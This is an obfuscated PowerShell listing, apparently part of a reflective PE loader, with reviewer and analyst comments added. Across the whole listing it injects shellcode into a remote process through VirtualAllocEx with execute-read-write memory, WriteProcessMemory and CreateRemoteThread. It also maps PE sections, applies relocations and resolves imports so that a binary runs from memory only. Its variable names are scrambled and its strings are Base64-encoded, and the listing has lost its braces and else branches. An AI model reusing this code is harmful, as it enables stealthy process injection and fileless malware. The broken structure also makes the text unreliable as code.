Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzACAAZgBvAHIAIAB0AGgAZQAgAHIAZQB0AHUAcgBuACAAdgBhAGwAdQBlACAAbwBmACAARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzAA==')))
[Byte[]]${00010100010111010} = @()
# Two alternative sets of five byte fragments; the first set follows the
# PE64Bit check, the second is presumably used otherwise.
if (${_00110100101000100}.PE64Bit -eq $true)
${00010000001011100} = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
${01101000010001010} = @(0x48, 0xba)
${10111001001001111} = @(0x48, 0xb8)
${10111010010111000} = @(0xff, 0xd0, 0x48, 0xb9)
${00100111010100001} = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
${00010000001011100} = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)
${01101000010001010} = @(0xb9)
${10111001001001111} = @(0x51, 0x50, 0xb8)
${10111010010111000} = @(0xff, 0xd0, 0xb9)
${00100111010100001} = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)
# Total size: the five fragments plus four pointer-sized slots.
${10100011000000001} = ${00010000001011100}.Length + ${01101000010001010}.Length + ${10111001001001111}.Length + ${10111010010111000}.Length + ${00100111010100001}.Length + (${01001001001010110} * 4)
${01101100010011100} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${10100011000000001})
${10101000010001101} = ${01101100010011100}
# Slot 1: the remote module handle.
_01011110000000101 -_00101110110110110 ${00010000001011100} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${00010000001011100}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${_01110010110011000}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
# Slot 2: the remote name buffer, or the pass-through value.
_01011110000000101 -_00101110110110110 ${01101000010001010} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01101000010001010}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10000110110110111}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
# Slot 3: the address obtained for "GetProcAddress".
_01011110000000101 -_00101110110110110 ${10111001001001111} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${10111001001001111}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${00101100001110101}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
# Slot 4: the remote return-value buffer.
_01011110000000101 -_00101110110110110 ${10111010010111000} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${10111010010111000}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${00100010101000101}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
_01011110000000101 -_00101110110110110 ${00100111010100001} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${00100111010100001}.Length)
# Executable + writable region in the target process.
${00110110110011110} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, [IntPtr]::Zero, [UIntPtr][UInt64]${10100011000000001}, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
if (${00110110110011110} -eq [IntPtr]::Zero)
# decodes to: "Unable to allocate memory in the remote process for shellcode"
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzACAAZgBvAHIAIABzAGgAZQBsAGwAYwBvAGQAZQA=')))
[UIntPtr]${01101111010110100} = [UIntPtr]::Zero
${01100111110111001} = $Win32Functions.WriteProcessMemory.Invoke(${_10010001100101011}, ${00110110110011110}, ${10101000010001101}, [UIntPtr][UInt64]${10100011000000001}, [Ref]${01101111010110100})
if ((${01100111110111001} -eq $false) -or ([UInt64]${01101111010110100} -ne [UInt64]${10100011000000001}))
# decodes to: "Unable to write shellcode to remote process memory."
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIAB3AHIAaQB0AGUAIABzAGgAZQBsAGwAYwBvAGQAZQAgAHQAbwAgAHIAZQBtAG8AdABlACAAcAByAG8AYwBlAHMAcwAgAG0AZQBtAG8AcgB5AC4A')))
${01011010001111011} = _00100111111000100 -_10011010100110011 ${_10010001100101011} -_01110111110010110 ${00110110110011110} -Win32Functions $Win32Functions
${01111011110110011} = $Win32Functions.WaitForSingleObject.Invoke(${01011010001111011}, 20000)
if (${01111011110110011} -ne 0)
# decodes to: "Call to CreateRemoteThread to call GetProcAddress failed."
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkACAAdABvACAAYwBhAGwAbAAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAgAGYAYQBpAGwAZQBkAC4A')))
[IntPtr]${10000111100011011} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${01001001001010110})
${01111011110110011} = $Win32Functions.ReadProcessMemory.Invoke(${_10010001100101011}, ${00100010101000101}, ${10000111100011011}, [UIntPtr][UInt64]${01001001001010110}, [Ref]${01101111010110100})
# A read of zero bytes is treated as failure too.
if ((${01111011110110011} -eq $false) -or (${01101111010110100} -eq 0))
# decodes to: "Call to ReadProcessMemory failed"
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFIAZQBhAGQAUAByAG8AYwBlAHMAcwBNAGUAbQBvAHIAeQAgAGYAYQBpAGwAZQBkAA==')))
[IntPtr]${00011010010011110} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10000111100011011}, [Type][IntPtr])
# Release the remote executable region and the remote return buffer.
$Win32Functions.VirtualFreeEx.Invoke(${_10010001100101011}, ${00110110110011110}, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
$Win32Functions.VirtualFreeEx.Invoke(${_10010001100101011}, ${00100010101000101}, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
# The name buffer exists only in the by-name case, so it is freed only then.
if (-not ${_00110010001110110})
{
$Win32Functions.VirtualFreeEx.Invoke(${_10010001100101011}, ${10000110110110111}, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
}
return ${00011010010011110}
# Copies each section of a PE file from a byte array into the memory region
# described by the PE-info object, zero-filling any part of a section that has
# no raw data.
#
# Parameters:
#   ${_00000000110100000} - Byte[] holding the raw PE file.
#   ${_00110100101000100} - PE-info object (PEHandle, SectionHeaderPtr,
#                           IMAGE_NT_HEADERS are read here).
#   $Win32Functions       - object exposing memset.
#   $Win32Types           - object exposing IMAGE_SECTION_HEADER.
#
# NOTE(review): brace lines are missing from this listing; nesting is inferred.
# NOTE(review): PointerToRawData comes from the file itself and is used as the
# source index of Marshal.Copy. Only the destination range is passed to the
# helper _10111001011100100 (presumably a bounds check; defined elsewhere), so
# a malformed section table is caught on the source side only by Marshal.Copy's
# own argument validation.
Function _10000010011101000
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Byte[]]
${_00000000110100000},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
${_00110100101000100},
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Functions,
[Parameter(Position = 3, Mandatory = $true)]
[System.Object]
$Win32Types
for( ${01101000000100101} = 0; ${01101000000100101} -lt ${_00110100101000100}.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; ${01101000000100101}++)
# i-th section header, then its destination: PEHandle + VirtualAddress.
[IntPtr]${10010110010010000} = [IntPtr](_01101001110001101 ([Int64]${_00110100101000100}.SectionHeaderPtr) (${01101000000100101} * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
${00101110000000011} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10010110010010000}, [Type]$Win32Types.IMAGE_SECTION_HEADER)
[IntPtr]${01011011001001010} = [IntPtr](_01101001110001101 ([Int64]${_00110100101000100}.PEHandle) ([Int64]${00101110000000011}.VirtualAddress))
# Bytes to copy: SizeOfRawData, forced to 0 when there is no raw data pointer
# and capped at VirtualSize.
${10111000011110010} = ${00101110000000011}.SizeOfRawData
if (${00101110000000011}.PointerToRawData -eq 0)
${10111000011110010} = 0
if (${10111000011110010} -gt ${00101110000000011}.VirtualSize)
${10111000011110010} = ${00101110000000011}.VirtualSize
if (${10111000011110010} -gt 0)
# label decodes to: "Copy-Sections::MarshalCopy"
_10111001011100100 -_00011000000111011 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHAAeQAtAFMAZQBjAHQAaQBvAG4AcwA6ADoATQBhAHIAcwBoAGEAbABDAG8AcAB5AA=='))) -_00110100101000100 ${_00110100101000100} -_01110111110010110 ${01011011001001010} -_00100011000001010 ${10111000011110010} | Out-Null
[System.Runtime.InteropServices.Marshal]::Copy(${_00000000110100000}, [Int32]${00101110000000011}.PointerToRawData, ${01011011001001010}, ${10111000011110010})
# Remainder of the section (VirtualSize minus the copied bytes) is set to zero.
if (${00101110000000011}.SizeOfRawData -lt ${00101110000000011}.VirtualSize)
${01011101111101110} = ${00101110000000011}.VirtualSize - ${10111000011110010}
[IntPtr]${_01110111110010110} = [IntPtr](_01101001110001101 ([Int64]${01011011001001010}) ([Int64]${10111000011110010}))
# label decodes to: "Copy-Sections::Memset"
_10111001011100100 -_00011000000111011 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHAAeQAtAFMAZQBjAHQAaQBvAG4AcwA6ADoATQBlAG0AcwBlAHQA'))) -_00110100101000100 ${_00110100101000100} -_01110111110010110 ${_01110111110010110} -_00100011000001010 ${01011101111101110} | Out-Null
$Win32Functions.memset.Invoke(${_01110111110010110}, 0, [IntPtr]${01011101111101110}) | Out-Null
# Applies base relocations to a mapped PE image when it was not placed at the
# base address passed in.
#
# Parameters:
#   ${_00110100101000100} - PE-info object (PEHandle, EffectivePEHandle and
#                           IMAGE_NT_HEADERS are read here).
#   ${_10110001101101110} - Int64 base address the image was built for
#                           (presumably OptionalHeader.ImageBase; confirm at
#                           the caller).
#   $Win32Constants       - object exposing the IMAGE_REL_BASED_* values.
#   $Win32Types           - object exposing IMAGE_BASE_RELOCATION.
# Returns nothing. Throws on a relocation type other than HIGHLOW, DIR64 or
# ABSOLUTE.
#
# Helpers defined outside this view: _01101001110001101 (presumably add),
# _10000100001010111 (presumably subtract), _00010110101001010 (presumably a
# greater-than comparison).
# NOTE(review): brace lines, `else` keywords and what is presumably a `break`
# after the SizeOfBlock check are missing from this listing.
Function _01101011110101010
Param(
[Parameter(Position = 0, Mandatory = $true)]
[System.Object]
${_00110100101000100},
[Parameter(Position = 1, Mandatory = $true)]
[Int64]
${_10110001101101110},
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Constants,
[Parameter(Position = 3, Mandatory = $true)]
[System.Object]
$Win32Types
# Difference between the two bases, and a flag that selects add vs. subtract.
[Int64]${10100001101110010} = 0
${00111000001000110} = $true
[UInt32]${00001111010101000} = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)
# Nothing to do when the bases match or the relocation table is empty.
if ((${_10110001101101110} -eq [Int64]${_00110100101000100}.EffectivePEHandle) `
-or (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))
return
elseif ((_00010110101001010 (${_10110001101101110}) (${_00110100101000100}.EffectivePEHandle)) -eq $true)
${10100001101110010} = _10000100001010111 (${_10110001101101110}) (${_00110100101000100}.EffectivePEHandle)
${00111000001000110} = $false
elseif ((_00010110101001010 (${_00110100101000100}.EffectivePEHandle) (${_10110001101101110})) -eq $true)
${10100001101110010} = _10000100001010111 (${_00110100101000100}.EffectivePEHandle) (${_10110001101101110})
# First relocation block: PEHandle + BaseRelocationTable.VirtualAddress.
[IntPtr]${01110101010010000} = [IntPtr](_01101001110001101 ([Int64]${_00110100101000100}.PEHandle) ([Int64]${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))
while($true)
${10000011100001100} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${01110101010010000}, [Type]$Win32Types.IMAGE_BASE_RELOCATION)
# A block with SizeOfBlock 0 marks the end of the table.
if (${10000011100001100}.SizeOfBlock -eq 0)
[IntPtr]${00001101100111001} = [IntPtr](_01101001110001101 ([Int64]${_00110100101000100}.PEHandle) ([Int64]${10000011100001100}.VirtualAddress))
# Entry count: (block size - block header size) / 2, i.e. 16-bit entries.
${00010010101110111} = (${10000011100001100}.SizeOfBlock - ${00001111010101000}) / 2
for(${01101000000100101} = 0; ${01101000000100101} -lt ${00010010101110111}; ${01101000000100101}++)
${10000000000001010} = [IntPtr](_01101001110001101 ([IntPtr]${01110101010010000}) ([Int64]${00001111010101000} + (2 * ${01101000000100101})))
[UInt16]${00110000110010111} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10000000000001010}, [Type][UInt16])
# Low 12 bits: offset inside the block. High 4 bits: relocation type, moved
# down by halving twelve times instead of using a shift operator.
[UInt16]${01011000001101111} = ${00110000110010111} -band 0x0FFF
[UInt16]${10000101001000011} = ${00110000110010111} -band 0xF000
for (${00010011010111000} = 0; ${00010011010111000} -lt 12; ${00010011010111000}++)
${10000101001000011} = [Math]::Floor(${10000101001000011} / 2)
if ((${10000101001000011} -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `
-or (${10000101001000011} -eq $Win32Constants.IMAGE_REL_BASED_DIR64))
# Read the pointer stored at the fix-up address, adjust it by the delta (add in
# one case, subtract in the other) and write it back.
[IntPtr]${01010010010111100} = [IntPtr](_01101001110001101 ([Int64]${00001101100111001}) ([Int64]${01011000001101111}))
[IntPtr]${10010111110110110} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${01010010010111100}, [Type][IntPtr])
if (${00111000001000110} -eq $true)
[IntPtr]${10010111110110110} = [IntPtr](_01101001110001101 ([Int64]${10010111110110110}) (${10100001101110010}))
[IntPtr]${10010111110110110} = [IntPtr](_10000100001010111 ([Int64]${10010111110110110}) (${10100001101110010}))
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10010111110110110}, ${01010010010111100}, $false) | Out-Null
elseif (${10000101001000011} -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)
# decodes to "Unknown relocation found, relocation value: ..., relocationinfo: ..."
# with two variable references that ExpandString fills in at run time.
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGsAbgBvAHcAbgAgAHIAZQBsAG8AYwBhAHQAaQBvAG4AIABmAG8AdQBuAGQALAAgAHIAZQBsAG8AYwBhAHQAaQBvAG4AIAB2AGEAbAB1AGUAOgAgACQAewAxADAAMAAwADAAMQAwADEAMAAwADEAMAAwADAAMAAxADEAfQAsACAAcgBlAGwAbwBjAGEAdABpAG8AbgBpAG4AZgBvADoAIAAkAHsAMAAwADEAMQAwADAAMAAwADEAMQAwADAAMQAwADEAMQAxAH0A')))
# Next block starts SizeOfBlock bytes after the current one.
${01110101010010000} = [IntPtr](_01101001110001101 ([Int64]${01110101010010000}) ([Int64]${10000011100001100}.SizeOfBlock))
# Walks the import table of a mapped PE image, loads every imported DLL and
# writes the resolved function addresses into the image's import slots.
#
# Parameters:
#   ${_00110100101000100} - PE-info object (PEHandle, EffectivePEHandle and
#                           IMAGE_NT_HEADERS are read here).
#   $Win32Functions       - object exposing LoadLibrary and GetProcAddressIntPtr.
#   $Win32Types           - object exposing IMAGE_IMPORT_DESCRIPTOR.
#   $Win32Constants       - accepted but not referenced in the lines shown.
#   ${_10010001100101011} - optional IntPtr handle of a target process.
#
# When PEHandle differs from EffectivePEHandle the image is treated as living
# in another process: DLLs are loaded through _01001010011111000 and addresses
# resolved through _01011101100111011 (both defined earlier in this file).
# Otherwise LoadLibrary / GetProcAddressIntPtr are called in this process.
#
# Analyst note: import resolution done by script code rather than by the
# Windows loader is characteristic of reflective (memory-only) PE loading; the
# loaded image will not show up as a normally loaded module.
# NOTE(review): brace lines and several `else` keywords are missing from this
# listing, so the remote/local and ordinal/name splits below are inferred.
Function _01001001100111111
Param(
[Parameter(Position = 0, Mandatory = $true)]
[System.Object]
${_00110100101000100},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Functions,
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Types,
[Parameter(Position = 3, Mandatory = $true)]
[System.Object]
$Win32Constants,
[Parameter(Position = 4, Mandatory = $false)]
[IntPtr]
${_10010001100101011}
# Remote-process mode flag.
${01101001000001101} = $false
if (${_00110100101000100}.PEHandle -ne ${_00110100101000100}.EffectivePEHandle)
${01101001000001101} = $true
if (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
[IntPtr]${00001111100101111} = _01101001110001101 ([Int64]${_00110100101000100}.PEHandle) ([Int64]${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
while ($true)
${00001010000101100} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${00001111100101111}, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
# An all-zero descriptor terminates the import table.
if (${00001010000101100}.Characteristics -eq 0 `
-and ${00001010000101100}.FirstThunk -eq 0 `
-and ${00001010000101100}.ForwarderChain -eq 0 `
-and ${00001010000101100}.Name -eq 0 `
-and ${00001010000101100}.TimeDateStamp -eq 0)
# decodes to: "Done importing DLL imports"
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABvAG4AZQAgAGkAbQBwAG8AcgB0AGkAbgBnACAARABMAEwAIABpAG0AcABvAHIAdABzAA==')))
${10001010011100010} = [IntPtr]::Zero
# DLL name: ANSI string at PEHandle + descriptor.Name.
${_01010010101010011} = (_01101001110001101 ([Int64]${_00110100101000100}.PEHandle) ([Int64]${00001010000101100}.Name))
${00111101100010100} = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi(${_01010010101010011})
# Load the DLL in the target process, or (presumably else) in this one.
if (${01101001000001101} -eq $true)
${10001010011100010} = _01001010011111000 -_10010001100101011 ${_10010001100101011} -_01010010101010011 ${_01010010101010011}
${10001010011100010} = $Win32Functions.LoadLibrary.Invoke(${00111101100010100})
if ((${10001010011100010} -eq $null) -or (${10001010011100010} -eq [IntPtr]::Zero))
# decodes to "Error importing DLL, DLLName: ..." with a variable reference that
# ExpandString fills in at run time.
throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQByAHIAbwByACAAaQBtAHAAbwByAHQAaQBuAGcAIABEAEwATAAsACAARABMAEwATgBhAG0AZQA6ACAAJAB7ADAAMAAxADEAMQAxADAAMQAxADAAMAAwADEAMAAxADAAMAB9AA==')))
# Two parallel thunk arrays: the one at FirstThunk is written, the one at
# Characteristics is read (lookup entries).
[IntPtr]${10011011000001011} = _01101001110001101 (${_00110100101000100}.PEHandle) (${00001010000101100}.FirstThunk)
[IntPtr]${10010011111110111} = _01101001110001101 (${_00110100101000100}.PEHandle) (${00001010000101100}.Characteristics)
[IntPtr]${00111001000110110} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10010011111110111}, [Type][IntPtr])
while (${00111001000110110} -ne [IntPtr]::Zero)
${_00110010001110110} = $false
[IntPtr]${00001000011010011} = [IntPtr]::Zero
[IntPtr]${01110001000101100} = [IntPtr]::Zero
# A negative entry (top bit set) is an import by ordinal: keep the low 16 bits.
if([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4 -and [Int32]${00111001000110110} -lt 0)
[IntPtr]${00001000011010011} = [IntPtr]${00111001000110110} -band 0xffff
${_00110010001110110} = $true
elseif([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8 -and [Int64]${00111001000110110} -lt 0)
[IntPtr]${00001000011010011} = [Int64]${00111001000110110} -band 0xffff
${_00110010001110110} = $true
# Otherwise (presumably else) the entry is an RVA to a 2-byte field followed by
# the ANSI function name; the name is copied into an unmanaged buffer.
[IntPtr]${10010111111111000} = _01101001110001101 (${_00110100101000100}.PEHandle) (${00111001000110110})
${10010111111111000} = _01101001110001101 ${10010111111111000} ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))
${01010110000000010} = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi(${10010111111111000})
${00001000011010011} = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi(${01010110000000010})
# Resolve in the target process, or (presumably else) in this one.
if (${01101001000001101} -eq $true)
[IntPtr]${01110001000101100} = _01011101100111011 -_10010001100101011 ${_10010001100101011} -_01110010110011000 ${10001010011100010} -_10100110000101100 ${00001000011010011} -_00110010001110110 ${_00110010001110110}
[IntPtr]${01110001000101100} = $Win32Functions.GetProcAddressIntPtr.Invoke(${10001010011100010}, ${00001000011010011})
if (${01110001000101100} -eq $null -or ${01110001000101100} -eq [IntPtr]::Zero)
if (${_00110010001110110})
{
# decodes to "New function reference is null, this is almost certainly a bug in
# this script. Function Ordinal: ... Dll: ..." (variables expanded at run time).
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBlAHcAIABmAHUAbgBjAHQAaQBvAG4AIAByAGUAZgBlAHIAZQBuAGMAZQAgAGkAcwAgAG4AdQBsAGwALAAgAHQAaABpAHMAIABpAHMAIABhAGwAbQBvAHMAdAAgAGMAZQByAHQAYQBpAG4AbAB5ACAAYQAgAGIAdQBnACAAaQBuACAAdABoAGkAcwAgAHMAYwByAGkAcAB0AC4AIABGAHUAbgBjAHQAaQBvAG4AIABPAHIAZABpAG4AYQBsADoAIAAkAHsAMAAwADAAMAAxADAAMAAwADAAMQAxADAAMQAwADAAMQAxAH0ALgAgAEQAbABsADoAIAAkAHsAMAAwADEAMQAxADEAMAAxADEAMAAwADAAMQAwADEAMAAwAH0A')))
}
else
{
# same message with "Function: ..." instead of "Function Ordinal: ...".
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBlAHcAIABmAHUAbgBjAHQAaQBvAG4AIAByAGUAZgBlAHIAZQBuAGMAZQAgAGkAcwAgAG4AdQBsAGwALAAgAHQAaABpAHMAIABpAHMAIABhAGwAbQBvAHMAdAAgAGMAZQByAHQAYQBpAG4AbAB5ACAAYQAgAGIAdQBnACAAaQBuACAAdABoAGkAcwAgAHMAYwByAGkAcAB0AC4AIABGAHUAbgBjAHQAaQBvAG4AOgAgACQAewAwADEAMAAxADAAMQAxADAAMAAwADAAMAAwADAAMAAxADAAfQAuACAARABsAGwAOgAgACQAewAwADAAMQAxADEAMQAwADEAMQAwADAAMAAxADAAMQAwADAAfQA=')))
}
# Write the resolved address into the import slot, then advance both arrays by
# one pointer and read the next lookup entry.
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${01110001000101100}, ${10011011000001011}, $false)
${10011011000001011} = _01101001110001101 ([Int64]${10011011000001011}) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
[IntPtr]${10010011111110111} = _01101001110001101 ([Int64]${10010011111110111}) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
[IntPtr]${00111001000110110} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10010011111110111}, [Type][IntPtr])
# Only a by-name import allocated an unmanaged string, so only that is freed.
if ((-not ${_00110010001110110}) -and (${00001000011010011} -ne [IntPtr]::Zero))
{
[System.Runtime.InteropServices.Marshal]::FreeHGlobal(${00001000011010011})
${00001000011010011} = [IntPtr]::Zero
}
# Next import descriptor.
${00001111100101111} = _01101001110001101 (${00001111100101111}) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
# Translates a PE section's Characteristics flags into a page-protection value.
#
# Parameter:
#   ${_01010110001101100} - UInt32 section Characteristics.
# Returns: one of the $Win32Constants.PAGE_* values, with PAGE_NOCACHE OR-ed in
# when IMAGE_SCN_MEM_NOT_CACHED is set.
# Reads $Win32Constants from an enclosing scope; it is not a parameter here.
#
# The three flags tested are MEM_EXECUTE, MEM_READ and MEM_WRITE; the eight
# assignments below cover their combinations, from PAGE_EXECUTE_READWRITE down
# to PAGE_NOACCESS.
# NOTE(review): brace lines and every `else` keyword are missing from this
# listing, so which assignment belongs to which combination is inferred from
# the order of the statements only.
Function _00100001100110111
Param(
[Parameter(Position = 0, Mandatory = $true)]
[UInt32]
${_01010110001101100}
${01111110100001000} = 0x0
# Executable sections.
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
${01111110100001000} = $Win32Constants.PAGE_EXECUTE_READWRITE
${01111110100001000} = $Win32Constants.PAGE_EXECUTE_READ
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
${01111110100001000} = $Win32Constants.PAGE_EXECUTE_WRITECOPY
${01111110100001000} = $Win32Constants.PAGE_EXECUTE
# Non-executable sections (presumably the else branch of the first test).
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
${01111110100001000} = $Win32Constants.PAGE_READWRITE
${01111110100001000} = $Win32Constants.PAGE_READONLY
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
${01111110100001000} = $Win32Constants.PAGE_WRITECOPY
${01111110100001000} = $Win32Constants.PAGE_NOACCESS
# The no-cache modifier is combined with whatever was chosen above.
if ((${_01010110001101100} -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)
${01111110100001000} = ${01111110100001000} -bor $Win32Constants.PAGE_NOCACHE
return ${01111110100001000}
# Sets the final page protection of every section of a mapped PE image
# according to the section's Characteristics.
#
# Parameters:
#   ${_00110100101000100} - PE-info object (PEHandle, SectionHeaderPtr and
#                           IMAGE_NT_HEADERS are read here).
#   $Win32Functions       - object exposing VirtualProtect.
#   $Win32Constants       - accepted but not referenced directly in the lines
#                           shown.
#   $Win32Types           - object exposing IMAGE_SECTION_HEADER.
# Throws when VirtualProtect reports failure.
#
# Analyst note: VirtualProtect (not VirtualProtectEx) is used, so this changes
# protections in the calling process. Sections whose flags map to an
# executable protection end up as executable memory that is not backed by a
# file on disk, which memory scanners commonly flag.
# NOTE(review): brace lines are missing from this listing; nesting is inferred.
Function _01000100111001001
Param(
[Parameter(Position = 0, Mandatory = $true)]
[System.Object]
${_00110100101000100},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Functions,
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Constants,
[Parameter(Position = 3, Mandatory = $true)]
[System.Object]
$Win32Types
for( ${01101000000100101} = 0; ${01101000000100101} -lt ${_00110100101000100}.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; ${01101000000100101}++)
# i-th section header and the section's address: PEHandle + VirtualAddress.
[IntPtr]${10010110010010000} = [IntPtr](_01101001110001101 ([Int64]${_00110100101000100}.SectionHeaderPtr) (${01101000000100101} * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
${00101110000000011} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10010110010010000}, [Type]$Win32Types.IMAGE_SECTION_HEADER)
[IntPtr]${01110001011001101} = _01101001110001101 (${_00110100101000100}.PEHandle) (${00101110000000011}.VirtualAddress)
# Protection value comes from _00100001100110111 (defined just above in this file).
[UInt32]${11000001100000010} = _00100001100110111 ${00101110000000011}.Characteristics
[UInt32]${10001110000011011} = ${00101110000000011}.VirtualSize
# Receives the previous protection from VirtualProtect; not used afterwards.
[UInt32]${00100111001001011} = 0
# label decodes to: "Update-MemoryProtectionFlags::VirtualProtect"
# _10111001011100100 is presumably a range check on address + size; defined elsewhere.
_10111001011100100 -_00011000000111011 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBwAGQAYQB0AGUALQBNAGUAbQBvAHIAeQBQAHIAbwB0AGUAYwB0AGkAbwBuAEYAbABhAGcAcwA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0AA=='))) -_00110100101000100 ${_00110100101000100} -_01110111110010110 ${01110001011001101} -_00100011000001010 ${10001110000011011} | Out-Null
